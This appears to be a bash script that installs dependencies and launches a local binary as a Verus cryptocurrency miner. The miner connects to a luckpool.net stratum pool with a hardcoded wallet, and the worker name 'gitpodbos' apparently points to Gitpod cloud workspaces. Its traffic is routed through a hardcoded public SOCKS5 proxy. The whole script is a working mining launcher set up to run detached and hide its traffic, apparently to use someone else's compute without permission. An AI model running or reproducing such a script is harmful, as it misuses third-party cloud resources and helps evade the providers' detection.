#!/bin/bash
sudo apt update
sudo apt install screen libjansson4 -y
sudo apt-get install git build-essential cmake libuv1-dev libssl-dev libhwloc-dev -y
screen -dmS ls
A=stratum+tcp://na.luckpool.net:3956
B=REL6XKj49hmLeNdbwjtazXPWciq6gHdb5R
C=gitpodbos
D=socks5://184.178.172.14:4145

chmod u+x 2 && ./2 -a verus -o $A -u $B.$C -x $D  -p x -t 4
